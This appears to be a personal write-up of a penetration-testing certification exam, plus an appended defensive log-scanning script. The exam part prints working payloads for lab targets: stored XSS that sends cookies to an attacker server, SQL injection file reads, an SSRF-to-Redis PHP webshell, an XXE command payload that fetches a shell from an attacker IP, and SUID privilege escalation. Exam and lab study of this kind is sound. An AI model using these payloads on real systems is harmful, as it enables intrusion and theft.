True unfreedom is building a cage inside your own heart.

CISP-PTS exam record

The PTS exam took less than half a month from registration to sitting it. If you have practiced the question bank, it is quite easy to pass, because many questions are basically the same as the training ones. However, there are some questions that even the training institutions don't know. For example, in this exam the last major question involved a service called Nacos; since Nacos has no exploit, I tried common weak passwords, couldn't get in, and gave up on it. Most of the questions only had 2 keys (20 points); if you make sure all the earlier keys are obtained you already have 80 points, and you only need to score above 70 to pass.

Let me talk about the questions I encountered in the exam.

Scenario 1

XSS + SQLi + file reading, relatively simple.

For the XSS, start a web server with Python on the attacking machine, then insert the payload. This uses a stored XSS vulnerability to plant the payload and capture the administrator's cookie.

<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>

Obtaining the administrator's cookie

Right-click the page in the browser, choose Inspect, open the Application tab, find Storage - Cookies, and replace the cookie with the administrator's.


SQLi payload

http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#

Or run sqlmap

http://IP:3603/admin/edit.php?id=11 (GET)  
# sqlmap.py -u http://10.52.0.29:3603/admin/edit.php?id=11 --cookie=PHPSESSID=732ece3c4dcdba588d48593d689bf927 --dbms mysql --file-read /var/key2

Arbitrary file reading

http://IP:3603/admin/setting.php?page=/tmp/key3

Scenario 2

SSRF + Redis getshell

SSRF: a directory scan finds robots.txt; download backup.zip and unzip it to get a txt file that gives a web port. Enter http://localhost:1234 in the search box the question provides to obtain the first key.

Redis getshell:

Write webshell

dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save

Write private key


This yields the second key; the third key is in the scheduled tasks.

Scenario 3

An XXE vulnerability.

Write a webshell through the expect wrapper: expect can execute commands, so start a web server on the attacking machine and have the target fetch the shell with curl.

Execute command

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>

Write shell

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>

Privilege escalation

find / -perm -u=s -type f 2>/dev/null
find 1 -exec ls /root \;
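As an added defender-side example (not part of the original post), the following Python detector flags the request patterns used across the three scenarios above, namely cookie exfiltration via XSS, UNION/load_file injection, absolute-path file reads, SSRF to loopback and to Redis over dict://, and expect:// XXE entities, in constructed sample access-log lines; the log format, client IPs and rule names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post), formatted as
# "<client-ip> <method> <path-with-query or body excerpt>".
SAMPLE_LOG = """\
10.0.0.5 POST /comment.php body=<script>document.write('<img src="http://10.0.0.5:1234/?cookie='+document.cookie+'" />')</script>
10.0.0.5 GET /admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#
10.0.0.5 GET /admin/setting.php?page=/tmp/key3
10.0.0.7 GET /search?url=http://localhost:1234
10.0.0.7 GET /search?url=dict%3A%2F%2Flocalhost%3A6379%2Fconfig%3Aset%3Adbfilename%3Aa.php
10.0.0.9 POST /upload.php body=<!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>
10.0.0.2 GET /admin/edit.php?id=11
10.0.0.2 POST /upload.php body=<?xml version="1.0"?><p>hello</p>
"""

# One signature per technique in the write-up; each is run against the URL-decoded
# line so percent-encoding (as in the dict:// line above) does not hide the pattern.
RULES = {
    "xss-cookie-exfil": re.compile(r"document\.cookie", re.I),
    "sqli-load_file": re.compile(r"union(?:\s|/\*.*?\*/)+select.*load_file\s*\(", re.I),
    "file-read-absolute-path": re.compile(r"[?&]page=/", re.I),
    "ssrf-loopback": re.compile(r"\w+://(?:localhost|127\.0\.0\.1)", re.I),
    "ssrf-redis-dict": re.compile(r"dict://[^\s/]*:6379/(?:config|flushall|set|save)", re.I),
    "xxe-expect": re.compile(r"<!ENTITY\s+\w+\s+SYSTEM\s+[\"']expect://", re.I),
}

def scan_line(line):
    """Return the names of every rule matching one log line (decoded first)."""
    decoded = unquote(line)
    return [name for name, pat in RULES.items() if pat.search(decoded)]

def scan_log(text):
    """Return (line_number, client_ip, matched_rules) for each line that fired."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        matched = scan_line(line) if line.strip() else []
        if matched:
            findings.append((number, line.split(" ", 1)[0], matched))
    return findings

def clients_by_technique_count(findings):
    """Rank clients by how many distinct techniques they used: a host chaining
    several of them is the one to triage first."""
    seen = {}
    for _, client, matched in findings:
        seen.setdefault(client, set()).update(matched)
    return sorted(((c, len(r)) for c, r in seen.items()), key=lambda x: (-x[1], x[0]))
```

Running `scan_log(SAMPLE_LOG)` flags six of the eight lines and `clients_by_technique_count` ranks 10.0.0.5 first, since it chained three techniques.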